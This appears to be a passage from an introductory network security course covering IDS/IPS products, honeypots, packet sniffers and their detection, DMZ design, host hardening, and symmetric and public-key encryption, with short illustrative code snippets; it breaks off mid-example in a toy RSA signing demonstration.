A Host Intrusion Detection System (HIDS) consists of software applications (agents) installed on
the workstations which are to be monitored. The agents monitor the operating system and write
data to log files and/or trigger alarms. A Host Intrusion Detection System (HIDS) can only
monitor the individual workstations on which the agents are installed; it cannot monitor the
entire network. Host-based IDS systems are used to monitor intrusion attempts on critical servers.

The drawbacks of Host Intrusion Detection Systems (HIDS) are

• It is difficult to analyze the intrusion attempts on multiple computers.

• Host Intrusion Detection Systems (HIDS) can be very difficult to maintain in large networks
with different operating systems and configurations.

• Host Intrusion Detection Systems (HIDS) can be disabled by attackers after the system is
compromised.

Knowledge-based (Signature-based) IDS and behavior-based (Anomaly-based) IDS

A knowledge-based (signature-based) Intrusion Detection System (IDS) references a database
of previous attack signatures and known system vulnerabilities. In the context of Intrusion
Detection Systems (IDS), a signature is recorded evidence of an intrusion or attack. Each
intrusion leaves a footprint behind (e.g., nature of data packets, failed attempts to run an
application, failed logins, file and folder access etc.). These footprints are called signatures
and can be used to identify and prevent the same attacks in the future. Based on these signatures,
a knowledge-based (signature-based) IDS identifies intrusion attempts.

The disadvantages of signature-based Intrusion Detection Systems (IDS) are that the signature
database must be continually updated and maintained, and that a signature-based IDS may fail to
identify unique or novel attacks.

A behavior-based (anomaly-based) Intrusion Detection System (IDS) references a baseline or
learned pattern of normal system activity to identify active intrusion attempts. Deviations from
this baseline or pattern cause an alarm to be triggered.

Higher false-alarm rates are often associated with behavior-based Intrusion Detection Systems (IDS).
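The baseline idea behind behavior-based detection can be sketched as follows (a toy single-feature model with made-up traffic counts; real systems track many features at once):

```python
# Toy sketch of anomaly-based detection: learn a baseline of normal activity,
# then flag values that deviate far from it.
import statistics

def build_baseline(samples):
    """Learn mean and standard deviation from observed normal activity."""
    return statistics.mean(samples), statistics.stdev(samples)

def is_anomalous(value, mean, stdev, threshold=3.0):
    """Flag values more than `threshold` standard deviations from the mean."""
    return abs(value - mean) > threshold * stdev

normal_traffic = [100, 110, 95, 105, 98, 102]   # packets/sec, hypothetical
mean, stdev = build_baseline(normal_traffic)
print(is_anomalous(104, mean, stdev))   # within baseline -> False
print(is_anomalous(900, mean, stdev))   # flood-like spike -> True
```

The threshold choice illustrates the false-alarm trade-off mentioned above: a lower threshold catches more attacks but also flags more legitimate deviations from the baseline.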

Leading Intrusion Detection Systems (IDS) Products

Some leading Intrusion Detection Systems (IDS) products are

• Snort

Snort® is an open source network intrusion prevention and detection system (IDS/IPS) developed
by Sourcefire. Combining the benefits of signature, protocol and anomaly-based inspection, Snort
is the most widely deployed IDS/IPS technology worldwide. With millions of downloads and
approximately 300,000 registered users, Snort has become the de facto standard for IPS.

• CounterACT

CounterACT Edge security appliance delivers an entirely unique approach to preventing network
intrusions: Stop attackers based on their "proven intent" to attack without using signatures,
anomaly detection or pattern matching of any kind.

Attackers follow a consistent pattern. To launch an attack, they need knowledge about a network's
resources. Potential intruders, whether humans or self-propagating threats, compile vulnerability
and configuration information through scanning and probing prior to an attack. The information
received is then used to launch attacks based on the unique structure and characteristics of the
targeted network.

• AirMagnet

AirMagnet Enterprise provides a simple, scalable WLAN monitoring solution that enables any
organization to proactively mitigate all types of wireless threats, enforce enterprise policies,
prevent performance problems and audit the regulatory compliance of all their WiFi assets and
users worldwide.

• Bro Intrusion Detection System

Bro is an open-source, Unix-based Network Intrusion Detection System (NIDS) that passively
monitors network traffic and looks for suspicious activity. Bro detects intrusions by first parsing
network traffic to extract its application-level semantics and then executing event-oriented
analyzers that compare the activity with patterns deemed troublesome. Its analysis includes
detection of specific attacks (including those defined by signatures, but also those defined in terms
of events) and unusual activities (e.g., certain hosts connecting to certain services, or patterns of
failed connection attempts).

• Cisco Intrusion Prevention System (IPS)

Cisco IPS is one of the most widely deployed intrusion prevention systems, providing protection
against more than 30,000 known threats, timely signature updates, and Cisco Global Correlation
to dynamically recognize, evaluate, and stop emerging Internet threats. Cisco IPS includes
industry-leading research and the expertise of Cisco Security Intelligence Operations.

Cisco IPS protects against increasingly sophisticated attacks, including directed attacks, worms,
botnets, malware and application abuse.

Cisco IPS also helps your organization comply with government regulations and consumer privacy
laws. It provides intrusion prevention that stops outbreaks at the network level before they reach
the desktop, prevents losses from disruptions, theft, or defacement, collaborates with other
network components for end-to-end, network-wide intrusion prevention, supports a wide range of
deployment options with near-real-time updates for the most recent threats, decreases legal
liability, protects brand reputation, and safeguards intellectual property.

• Juniper Networks Intrusion Detection & Prevention (IDP)

Juniper Networks IDP Series Intrusion Detection and Prevention Appliances with Multi-Method
Detection (MMD), offers comprehensive coverage by leveraging multiple detection mechanisms.
For example, by utilizing signatures, as well as other detection methods including protocol
anomaly and traffic anomaly detection, the Juniper Networks IDP Series appliances can thwart known
attacks as well as possible future variations of the attack. Backed by Juniper Networks Security
Lab, signatures for detection of new attacks are generated on a daily basis. Working very closely
with many software vendors to assess new vulnerabilities, it’s not uncommon for IDP Series to be
equipped to thwart attacks which have not yet occurred. Such day-zero coverage ensures that
you’re not merely reacting to new attacks, but proactively securing your network from future
attacks.

• McAfee Host Intrusion Prevention for server

Defend your servers from known and new zero-day attacks with McAfee Host Intrusion
Prevention. Boost security, lower costs by reducing the frequency and urgency of patching, and
simplify compliance.

• Sourcefire Intrusion Prevention System (IPS)


Built on the foundation of the award-winning Snort® rules-based detection engine, Sourcefire
IPS™ (Intrusion Prevention System) uses a powerful combination of vulnerability- and anomaly-
based inspection methods—at throughputs up to 10 Gbps—to analyze network traffic and prevent
critical threats from damaging your network. Whether deployed at the perimeter, in the DMZ, in
the core, or at critical network segments, and whether placed in inline or passive mode,
Sourcefire’s easy-to-use IPS appliances provide comprehensive threat protection.

• Strata Guard IDS/IPS

The award-winning Strata Guard® high-speed intrusion detection/prevention system (IDS/IPS)
gives you real-time, zero-day protection from network attacks and malicious traffic. It prevents
malware, spyware, port scans, viruses, and DoS/DDoS attacks from compromising hosts; device and
network outages; data leakage; high-risk protocols such as BitTorrent™, Kazaa™, and Telnet from
running on your network; and unauthorized access to sensitive data.

Introduction to Honeypots
A honeypot is a closely monitored computing resource that we want to be probed, attacked, or
compromised. A honeypot is defined as "an information system resource whose value lies in
unauthorized or illicit use of that resource". A honeypot can capture every action an intruder or
attacker makes inside it: it can log access attempts, capture keystrokes, identify the files
accessed and modified, and identify the programs executed within the honeypot. If an attacker is
unaware that he is inside a honeypot, we can even identify his ultimate intentions.

Honeypots can be placed inside the network, outside the network or inside DMZ (Demilitarized
Zone). They can even be placed in all of the above locations.

Honeypots are necessary to learn how intruders and attackers probe and attempt to gain access to
your systems. By learning and recording how intruders and attackers probe and attempt to gain
access to the systems, we can gain insight into attack methodologies to protect our real production
systems.

Honeypots are also necessary to record and provide forensic information of an attack to
government law enforcement agencies. These records generated by the honeypots are required to
prosecute the intruders and attackers.

What is Network Protocol Analysis?

Network protocol analysis (also known as network monitoring, network traffic analysis, protocol
analysis, sniffing, packet analysis, eavesdropping etc.) is the process of capturing network traffic
passing through the wire and inspecting it to troubleshoot network problems. A network protocol
analyzer decodes the data packets of network protocols and displays the network traffic in a
readable format. A network protocol analyzer has many uses. Some of them are

• Troubleshooting network problems.


• Analyzing the performance of a network.

• Network intrusion detection and detection of worms, viruses, compromised computers and
other types of network attacks.

• Logging network traffic for forensics and evidence.

• Analyzing the operations of applications.

Sniffers are dangerous to network security because they can capture network traffic and read
unencrypted data from the network, which makes them a favorite weapon of network intruders.
Network intruders use sniffing to capture confidential (unencrypted) information over the
network. Network intruders can use sniffers for capturing usernames and passwords which are
sent unencrypted, mapping the usage patterns of the users on a network, capturing VoIP
telephone conversations, mapping the network etc.
Note: The term "Sniffer" was a registered trademark of Network General. Network General later
merged with NetScout Systems Inc.

First, a network protocol analyzer (sniffer) switches the selected network interface into
promiscuous mode. In promiscuous mode the network card can listen for all network traffic on
its particular network segment. The network protocol analyzer (sniffer) uses this mode along
with low-level access to the interface to capture the raw binary data from the wire. The captured
binary data is then converted into a readable format, and once converted it is analyzed based on
the protocol.

A network protocol analyzer (sniffer) can analyze a large number of network protocols
including ARP, IP, ICMP, TCP, UDP, DCCP, HTTP, FTP, DNS, and DHCP.
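The "convert raw binary data into a readable format" step can be illustrated by decoding a raw 14-byte Ethernet header in Python (the frame bytes below are hand-built for illustration, not captured traffic):

```python
# Sketch: decoding the 14-byte Ethernet header (destination MAC, source MAC,
# EtherType) from raw captured bytes, as a protocol analyzer's first step.
import struct

def parse_ethernet_header(frame: bytes):
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    fmt = lambda mac: ":".join(f"{b:02x}" for b in mac)
    return fmt(dst), fmt(src), hex(ethertype)

# Hand-built example frame: broadcast destination, an example source MAC,
# EtherType 0x0800 (IPv4), followed by a placeholder payload.
frame = bytes.fromhex("ffffffffffff" "000c29108adc" "0800") + b"payload..."
print(parse_ethernet_header(frame))
# -> ('ff:ff:ff:ff:ff:ff', '00:0c:29:10:8a:dc', '0x800')
```

A full analyzer would then dispatch on the EtherType (0x0800 means an IPv4 packet follows) and keep decoding each layer's header the same way.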

Some leading Network Protocol Analyzer (Sniffer) products are
• Wireshark Network Protocol Analyzer
Wireshark is the world's foremost network protocol analyzer, and is the de facto (and often de
jure) standard across many industries and educational institutions.
• tcpdump
tcpdump is a common packet analyzer that runs under the command line. It allows the user to
intercept and display TCP/IP and other packets being transmitted or received over a network to
which the computer is attached. Distributed under the BSD license, tcpdump is free software.
• WinDump: tcpdump for Windows
WinDump is the Windows version of tcpdump, the command line network analyzer for UNIX.
WinDump is fully compatible with tcpdump and can be used to watch, diagnose and save to
disk network traffic according to various complex rules.
• OmniPeek Network Analyzer
OmniPeek is a commercial Network Protocol Analyzer (Sniffer). OmniPeek gives network
engineers real-time visibility and Expert Analysis into every part of the network from a single
interface, including Ethernet, Gigabit, 10 Gigabit, 802.11a/b/g/n wireless, VoIP, and Video to
remote offices. Using OmniPeek’s intuitive user interface and "top-down" approach to
visualizing network conditions, network engineers—even junior staff—can quickly analyze,
drill down and fix performance bottlenecks across multiple network segments, maximizing
uptime and user satisfaction.
• Windows Network Monitor
Windows Network Monitor is a built-in Network Protocol Analyzer (Sniffer) product for
Windows Server Operating Systems.
• dsniff
dsniff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf,
mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data
(passwords, e-mail, files, etc.). arpspoof, dnsspoof, and macof facilitate the interception of
network traffic normally unavailable to an attacker (e.g., due to layer-2 switching). sshmitm and
webmitm implement active monkey-in-the-middle attacks against redirected SSH and HTTPS
sessions by exploiting weak bindings in ad-hoc PKI.
• Ettercap
Ettercap is a suite for man-in-the-middle attacks on a LAN. It features sniffing of live
connections, content filtering on the fly and many other interesting tricks. It supports active
and passive dissection of many protocols (even ciphered ones) and includes many features for
network and host analysis.
• ntop
ntop is a network traffic probe that shows network usage, similar to what the popular top
Unix command does. ntop is based on libpcap and has been written in a portable way in order to
run on virtually every Unix platform and on Win32 as well. ntop users can use a web browser
(e.g. Netscape) to navigate through ntop (which acts as a web server) traffic information and
get a dump of the network status. In the latter case, ntop can be seen as a simple RMON-like
agent with an embedded web interface.
• EtherApe
EtherApe is a graphical network monitor for Unix modeled after etherman. Featuring link
layer, ip and TCP modes, it displays network activity graphically. Hosts and links change in
size with traffic. Color coded protocols display. It supports Ethernet, FDDI, Token Ring,
ISDN, PPP and SLIP devices. It can filter traffic to be shown, and can read traffic from a file
as well as live from the network.
• Kismet
Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system.
Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and
(with appropriate hardware) can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet
also supports plugins which allow sniffing other media such as DECT. Kismet identifies
networks by passively collecting packets and detecting standard named networks, detecting
(and given time, decloaking) hidden networks, and inferring the presence of non-beaconing
networks via data traffic.

As discussed in the previous lesson, sniffers are dangerous to network security because they can
capture network traffic and read unencrypted data, which makes them a favorite weapon of network
intruders. Sniffers do not transmit any information; they collect network data packets passively.
Hence it is difficult to detect sniffers on a network. The following methods can be used to detect
sniffers.

Detecting Promiscuous Mode

A sniffer can run in one of two modes: non-promiscuous mode and promiscuous mode. Sniffers
operating in non-promiscuous mode can only collect data that is addressed to or sent from the
computer running the sniffer. Promiscuous mode allows a network adapter to collect all the
network traffic passing over the network, regardless of the destination address; this enables
sniffers to capture all network traffic. To detect promiscuous mode in a UNIX-type operating
system, use the command "ifconfig -a" (without quotes) and search for the PROMISC flag in the
output.

[root@Fed13 /]# ifconfig -a


eth0 Link encap:Ethernet HWaddr 00:0C:29:10:8A:DC
inet6 addr: fe80::20c:29ff:fe10:8adc/64 Scope:Link
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:468 (468.0 b)
Interrupt:18 Base address:0x2000

lo Link encap:Local Loopback


inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:104 errors:0 dropped:0 overruns:0 frame:0
TX packets:104 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:13880 (13.5 KiB) TX bytes:13880 (13.5 KiB)

Another command which can be used to detect promiscuous mode in UNIX-type operating
systems is "ip link".

[root@Fed13 ~]# ip link


1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: <BROADCAST,MULTICAST,PROMISC,UP,LOWER_UP> mtu 1500 qdisc
pfifo_fast state UNKNOWN qlen 1000
link/ether 00:0c:29:10:8a:dc brd ff:ff:ff:ff:ff:ff

To detect promiscuous mode in Windows operating systems, the free tool Promqry can be
used. Promqry is available for download from the Microsoft web site.
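On Linux, the same check can also be scripted by reading the interface flags from sysfs (a sketch assuming the `/sys/class/net/<iface>/flags` layout; IFF_PROMISC is the 0x100 bit in the interface flags word):

```python
# Sketch: detecting promiscuous mode programmatically on Linux by testing
# the IFF_PROMISC bit (0x100) in the interface flags.
IFF_PROMISC = 0x100

def is_promiscuous(flags: int) -> bool:
    return bool(flags & IFF_PROMISC)

def read_iface_flags(iface: str) -> int:
    """Read the hex flags word for an interface from sysfs (Linux only)."""
    with open(f"/sys/class/net/{iface}/flags") as f:
        return int(f.read().strip(), 16)

# Example flag words (hypothetical): the first mirrors an interface that is
# UP|BROADCAST|RUNNING|PROMISC|MULTICAST, the second the same without PROMISC.
print(is_promiscuous(0x1143))  # True
print(is_promiscuous(0x1043))  # False
```

On a live system you would call `is_promiscuous(read_iface_flags("eth0"))`; the hard-coded values above just demonstrate the bit test.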

Address Resolution Protocol (ARP) Method

Address Resolution Protocol (ARP) is used to resolve IP addresses to MAC addresses, and a
computer caches resolved addresses for future use. In this method we first send a non-broadcast
ARP request; a machine in promiscuous mode will see it and cache our ARP entry. Next we send a
broadcast ping packet with our IP but a different MAC address. Only a machine which has our
correct MAC address from the previously sniffed ARP frame will be able to respond to the
broadcast ping request.

Latency Method

In the latency method, a huge amount of data is sent on the network and the suspect machine is
pinged before and after the flooding. If a sniffer is running on the machine, it will be in
promiscuous mode and may need to parse the flood data, increasing its load. Because of the load,
it will take extra time to respond to the ping request, and this latency may indicate a sniffer
running on the target machine.

Monitoring the Hosts

In a busy network, capturing and analyzing huge amounts of network data may cause the CPU
workload to increase. Large disk space is also required to save the captured network data.
Increased CPU workload and disk usage without any obvious reason may indicate a sniffer running
on that machine.

DMZ (Demilitarized Zone), DMZ Servers, What is a Bastion Host?
DMZ is an abbreviation for Demilitarized Zone. The DMZ refers to a part of the network that is
neither part of the internal network nor directly part of the Internet. Normally, the DMZ is the
area between your Internet access router and your bastion host (a bastion host is a computer on a
network which is configured to withstand attacks).

The DMZ (Demilitarized Zone) is also known as a perimeter network. A DMZ adds an additional
layer of security to an organization's internal network: an external attacker has access only to
the network devices and servers in the DMZ. By creating a DMZ, an outside user needs to make at
least one hop in the DMZ before he can access sensitive information inside the trusted network.

The DMZ normally holds web servers, FTP servers, name servers (DNS), e-mail servers and
honeypots.

How to secure Workstations and Servers


Workstations are normally operated by end users with limited computer knowledge, and hence they
require much attention. Workstations communicate with other workstations and servers using
services such as file sharing, network services, and other application programs.

The following tips are helpful for securing workstations and servers.

• Select an operating system which is more secure and has fewer vulnerabilities. Download and
install hot fixes, service packs and updates without delay.

• Install a trusted and good antivirus and update it regularly.

• Install a good anti-spyware and update it regularly.

• Install Host Intrusion Detection System (HIDS) software such as ossec, tripwire or rkhunter.

• Install a good firewall and configure it properly for workstations and servers. Close all ports
which are not required.

• Enforce a strong password policy for users, which may protect against brute-force and
dictionary attacks.

• Select a web browser which is more stable and secure, because attacks can be launched through
browsers. If possible, disable script execution.

• Download and install software from trusted sites only. Try to install digitally signed software,
and view the digital certificate to check whether the certificate is OK.

• Disable all services and protocols that are not necessary, and run only those which are. Many
services have known vulnerabilities, and an attacker may exploit these vulnerabilities to gain
access to your workstation or server.

• Remove all shares that are not necessary.

• Attackers can launch attacks targeted at a specific operating system and its services once the
operating system and server application are identified. Example: by default, many web server
applications reveal the web server application name and version, and the operating system and its
version, in error messages. This may help an attacker exploit vulnerabilities of the web server
application and operating system. The web server application should be configured to hide this
information.

• If possible, try to change default administrative account names and passwords for Operating
Systems, Databases and other sensitive applications and services.

• Conduct a penetration test to check your workstations and servers.

• Keep all the sensitive data encrypted.


• Physical security is an important factor; without physical security, all the above tips are
of NO use.
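As a sketch of the strong-password tip above, a minimal policy check might look like this (the specific rules — length and character classes — are illustrative assumptions, not a standard):

```python
# Toy sketch of a password-policy check: require minimum length plus
# lowercase, uppercase, digit and punctuation characters.
import string

def is_strong(password: str, min_len: int = 12) -> bool:
    return (len(password) >= min_len
            and any(c.islower() for c in password)
            and any(c.isupper() for c in password)
            and any(c.isdigit() for c in password)
            and any(c in string.punctuation for c in password))

print(is_strong("password123"))        # False: too short, no upper/symbol
print(is_strong("C0rrect-Horse-42!"))  # True
```

Length and character variety are what slow down brute-force and dictionary attacks; real policies also check against lists of common passwords.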

What is Symmetric Encryption?


You will learn the terms encryption, encryption algorithm, encryption key and symmetric
encryption in this lesson.

Cryptography is the art and science of making data impossible to read. Cryptographic algorithms
start with plain, readable data (plaintext) and scramble it so it becomes an unreadable ciphertext.
Each encryption algorithm must also specify how the ciphertext can be decrypted back into the
plaintext it came from, so that the intended recipient can read it.

Encrypting plaintext to ciphertext gives high security to your confidential data: only the
authorized person who is supposed to read the document can read it.

Encryption Terms

Following are some important terms related with encryption. Before continuing, you should
know what these terms are.

Plaintext: The information in its original form. This is also known as cleartext.

Ciphertext: The information after it has been obfuscated by the encryption algorithm.

Encryption: The process of changing the plaintext into ciphertext.

Decryption: The process of changing the ciphertext into plaintext.

Encryption Algorithm: An encryption algorithm defines how the original plaintext data is
transformed into ciphertext. Both the data sender and the recipient must know which algorithm
was used, because the recipient must apply the same algorithm to decrypt the ciphertext back
into the original plaintext data.

Encryption Key: A key is a secret value used as an input to the algorithm, along with the
plaintext data, when plaintext is converted to ciphertext. In symmetric encryption, the same
secret key is used to decrypt the ciphertext back into plaintext data.

Cryptography: The art of concealing information using encryption.


Cryptographer: An individual who practices cryptography.

Cryptanalysis: The art of analyzing cryptographic algorithms for identifying the weaknesses.

Cryptanalyst: An individual who uses cryptanalysis to identify the weaknesses in cryptographic
algorithms.

What is Symmetric Encryption?

Symmetric encryption is the process of converting readable data into an unreadable format, and
back again, using the same key. Symmetric encryption algorithms use the same key for encryption
and decryption, so the key must be exchanged beforehand so that both the data sender and the
data recipient can access the plaintext data. The plaintext (readable text) is converted to
ciphertext (unreadable text) using the key, and at the receiving side the same key is used to
convert the ciphertext back to plaintext (readable text).

Symmetric Encryption Algorithms: DES, DESX, Triple DES (3DES), RC2, RC5, RC4, AES, IDEA,
Blowfish, CAST; Block Ciphers and Stream Ciphers
Data Encryption Standard (DES): An encryption algorithm that encrypts data with a 56-bit,
randomly generated symmetric key. DES is no longer considered secure and has been broken many
times. Data Encryption Standard (DES) was developed by IBM and the U.S. Government together.
DES is a block encryption algorithm.

Data Encryption Standard XORed (DESX): DESX is a stronger variation of the DES encryption
algorithm. In DESX, the input plaintext is bitwise XORed with 64 bits of additional key material
before encryption with DES and the output is also bitwise XORed with another 64 bits of key
material.

Triple DES (3DES): Triple DES was developed from DES. Each DES key is 64 bits long, consisting
of 56 effective key bits and 8 parity bits. In 3DES, the DES operation is applied three times:
the plaintext is encrypted with key A, decrypted with key B, and encrypted again with key C.
3DES is a block encryption algorithm.

RC2 and RC5: Ronald Rivest (RSA Labs) developed these algorithms. They are block encryption
algorithms with variable block and key sizes. Captured data is difficult to decrypt if the
attacker does not know the block and key sizes that were used.

RC4: A variable key-size stream cipher with byte-oriented operations. The algorithm is based on
the use of a random permutation and is commonly used for the encryption of traffic to and from
secure Web sites using the SSL protocol.

Advanced Encryption Standard (AES): Advanced Encryption Standard (AES) is a newer and stronger
encryption standard, which uses the Rijndael (pronounced Rhine-doll) algorithm. This algorithm
was developed by Joan Daemen and Vincent Rijmen of Belgium. AES will eventually displace DESX
and 3DES. AES supports 128-bit, 192-bit, and 256-bit keys.

International Data Encryption Algorithm (IDEA): IDEA encryption algorithm is the European
counterpart to the DES encryption algorithm. IDEA is a block cipher, designed by Dr. X. Lai and
Professor J. Massey. It operates on a 64-bit plaintext block and uses a 128-bit key. IDEA uses a
total of eight rounds in which it XOR’s, adds and multiplies four sub-blocks with each other, as
well as six 16-bit sub-blocks of key material.

Blowfish: Blowfish is a symmetric block cipher, designed by Bruce Schneier. Blowfish has a 64-
bit block size and a variable key length from 32 up to 448 bits. Bruce Schneier later created
Twofish, which performs a similar function on 128-bit blocks.

CAST: CAST is an algorithm developed by Carlisle Adams and Stafford Tavares. It’s used in
some products offered by Microsoft and IBM. CAST uses a 40-bit to 128-bit key, and it’s very
fast and efficient.

Note:

Block Cipher: A block cipher divides data into fixed-size chunks, pads the last chunk if
necessary, and then encrypts each chunk in turn.
Stream Cipher: A stream cipher uses a keystream of pseudo-random values, seeded with the
cipher key, to encrypt a stream of bits.
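The chunk-and-pad framing that a block cipher performs can be sketched as follows. This shows
only the splitting and PKCS#7-style padding over hypothetical 8-byte (DES-sized) blocks; the
per-block encryption itself is omitted:

```python
BLOCK_SIZE = 8  # bytes; DES-sized blocks, chosen for the example

def pad(data: bytes) -> bytes:
    # PKCS#7-style padding: append N bytes, each of value N, where N is the
    # number of bytes needed to fill the last block (always at least 1).
    n = BLOCK_SIZE - (len(data) % BLOCK_SIZE)
    return data + bytes([n]) * n

def unpad(data: bytes) -> bytes:
    # The value of the final byte tells us how many padding bytes to strip.
    return data[:-data[-1]]

def split_blocks(data: bytes) -> list:
    return [data[i:i + BLOCK_SIZE] for i in range(0, len(data), BLOCK_SIZE)]

padded = pad(b"HELLO WORLD")   # 11 bytes padded out to 16
blocks = split_blocks(padded)  # two 8-byte blocks, each encrypted in turn
assert all(len(b) == BLOCK_SIZE for b in blocks)
assert unpad(padded) == b"HELLO WORLD"
```

A stream cipher needs no such framing, since it encrypts bit by bit (or byte by byte) as data
arrives.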

What is Asymmetric Encryption? Private Key, Public Key

Asymmetric encryption increases the security of the encryption process by utilizing two
separate but mathematically related keys, known as a public key and a private key. Asymmetric
encryption algorithms use this mathematically related key pair for encryption and decryption.
One key of the pair is known as the public key and the other is the private key.

The private key is possessed only by the user or computer that generates the key pair. The
public key can be distributed to any person who wishes to send encrypted data to the private
key holder. It is computationally infeasible to derive the private key from the public key,
so it is safe to publish the public key.

If the public key is used for encryption, the associated private key is used for decryption.

If the private key is used for encryption, the associated public key is used for decryption.

First, the data sender obtains the recipient's public key. The plaintext is encrypted with an
asymmetric encryption algorithm using the recipient's public key, producing the ciphertext.
After the encryption process, the ciphertext is sent to the recipient through the unsecure
network. The recipient decrypts the ciphertext with his private key and can then access the
plaintext from the sender.

Asymmetric Encryption Algorithms: Diffie-Hellman, RSA, ECC, ElGamal, DSA
The following are the major asymmetric encryption algorithms used for encrypting or digitally
signing data.

Diffie-Hellman key agreement: The Diffie-Hellman key agreement algorithm was developed by Dr.
Whitfield Diffie and Dr. Martin Hellman in 1976. Diffie-Hellman is not itself an encryption or
decryption algorithm; rather, it enables the two parties involved in a communication to
generate a shared secret key for exchanging information confidentially. The working of
Diffie-Hellman key agreement can be explained as follows.

Assume we have two parties who need to communicate securely.

1) P1 and P2 agree on two large integers a and b such that 1 < a < b.

2) P1 then chooses a random number i and computes I = a^i mod b. P1 sends I to P2.

3) P2 then chooses a random number j and computes J = a^j mod b. P2 sends J to P1.

4) P1 computes k1 = J^i mod b.

5) P2 computes k2 = I^j mod b.

6) We have k1 = k2 = a^(ij) mod b and thus k1 and k2 are the secret keys for secure
transmission.
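The six steps above can be run directly with Python's modular exponentiation. The parameters a
and b below are toy values chosen for the example; real deployments use standardized prime
groups of 2048 bits or more:

```python
import secrets

# Step 1: public parameters agreed by both parties (toy values for illustration).
a = 5            # the base
b = 2**127 - 1   # a large prime modulus (a Mersenne prime)

# Step 2: P1 picks a secret i and sends I = a^i mod b to P2.
i = secrets.randbelow(b - 2) + 1
I = pow(a, i, b)

# Step 3: P2 picks a secret j and sends J = a^j mod b to P1.
j = secrets.randbelow(b - 2) + 1
J = pow(a, j, b)

# Steps 4-5: each side combines its own secret with the other's public value.
k1 = pow(J, i, b)   # computed by P1
k2 = pow(I, j, b)   # computed by P2

# Step 6: both sides now hold the same secret, a^(i*j) mod b.
assert k1 == k2
```

Only I and J travel over the network; an eavesdropper who sees them still cannot feasibly
recover i, j, or the shared key.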

Rivest Shamir Adleman (RSA): Ron Rivest, Adi Shamir, and Len Adleman released the
Rivest-Shamir-Adleman (RSA) public key algorithm in 1978. This algorithm can be used for
encrypting and signing data. The encryption and signing processes are performed through a
series of modular multiplications.

The basic RSA algorithm for confidentiality can be explained as below.

Ciphertext = (plaintext)^e mod n


Plaintext = (ciphertext)^d mod n
Private Key = {d, n}
Public Key = {e, n}

The basic RSA algorithm for authentication can be explained as below.

ciphertext = (plaintext)^d mod n


plaintext = (ciphertext)^e mod n
private key = {d, n}
public key = {e, n}
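These formulas can be checked with a textbook-sized toy key pair (tiny primes chosen for
illustration only; real RSA keys use primes hundreds of digits long, plus padding schemes
omitted here):

```python
# Toy RSA key generation.
p, q = 61, 53
n = p * q                 # public modulus
phi = (p - 1) * (q - 1)   # Euler's totient of n
e = 17                    # public exponent, coprime with phi
d = pow(e, -1, phi)       # private exponent: d*e = 1 (mod phi), Python 3.8+

plaintext = 65            # the message, encoded as a number smaller than n

# Confidentiality: encrypt with the public key {e, n},
# decrypt with the private key {d, n}.
ciphertext = pow(plaintext, e, n)
assert pow(ciphertext, d, n) == plaintext

# Authentication: "sign" with the private key {d, n},
# verify with the public key {e, n}.
signature = pow(plaintext, d, n)
assert pow(signature, e, n) == plaintext
```

Note how the two uses mirror each other: the same modular-exponentiation operation runs in
both directions, with the roles of e and d swapped.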

Elliptic Curve Cryptography (ECC): Elliptic Curve Cryptography (ECC) provides similar
functionality to RSA. Elliptic Curve Cryptography (ECC) is being implemented in smaller
devices like cell phones. It requires less computing power compared with RSA. ECC
encryption systems are based on the idea of using points on a curve to define the public/private
key pair.

ElGamal: ElGamal is an algorithm used for digital signatures and key exchange. It is based on
the difficulty of computing discrete logarithms. The Digital Signature Algorithm (DSA) is
based on the ElGamal algorithm.

Digital Signature Algorithm (DSA): The Digital Signature Algorithm (DSA) was developed by the
United States government for digital signatures. DSA can be used only for signing data; it
cannot be used for encryption. The DSA signing process is performed through a series of
calculations based on a selected prime number. Although originally intended to have a maximum
key size of 1,024 bits, longer key sizes are now supported.

When DSA is used, the process of creating the digital signature is faster than validating it.

When RSA is used, the process of validating the digital signature is faster than creating it.

Public Key Cryptography


Public key cryptography is based on asymmetric encryption. Asymmetric encryption makes use of
a mathematically linked pair of keys: one is known as the public key and the other as the
private key. Plaintext encrypted using one of the keys can only be decrypted using the other
key, and it is computationally infeasible to compute the private key from the published public
key. Each user has his own pair of keys, keeping the private key absolutely private and the
public key as public as possible.

The following text explains the concept more clearly. If Alice has in hand her own public key (PubA), her
own private key (PrivA), and Bob's public key (PubB), she can do the following:

• Encrypt the plaintext with Bob's public key (PubB)


• Calculate the hash sum of the plaintext and encrypt it with her own private key (PrivA)

• Combine the ciphertext and the encrypted hash sum in a message and send it to Bob.

Upon receiving this message, Bob, who should have in his possession his own public key (PubB), his own
private key (PrivB), and Alice's public key (PubA), can do the following:

• Decrypt the ciphertext with his own private key (PrivB)

• Decrypt the hash sum with Alice's public key (PubA)

• Calculate the hash sum of the plaintext and compare it with the decrypted hash sum

Bob can now decrypt the ciphertext to plaintext and, if the hash sums match, he can be sure
that the message has not been altered in transit.
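A minimal sketch of Alice and Bob's exchange, reusing toy RSA keys and SHA-256 as the hash
function (all primes and the message are made up for illustration; real systems use full-size
keys and proper padding):

```python
import hashlib

def make_keys(p, q, e=17):
    # Build a toy RSA key pair from two small primes.
    n, phi = p * q, (p - 1) * (q - 1)
    return (e, n), (pow(e, -1, phi), n)   # (public, private)

pub_b, priv_b = make_keys(61, 53)   # Bob's key pair (PubB, PrivB)
pub_a, priv_a = make_keys(67, 71)   # Alice's key pair (PubA, PrivA)

def hash_sum(msg: bytes, n: int) -> int:
    # SHA-256 digest, reduced so it fits under the toy modulus.
    return int.from_bytes(hashlib.sha256(msg).digest(), "big") % n

message = 42   # plaintext, encoded as a small number

# Alice: encrypt with PubB, and sign the hash sum with PrivA.
ciphertext = pow(message, *pub_b)
signature = pow(hash_sum(b"42", priv_a[1]), *priv_a)

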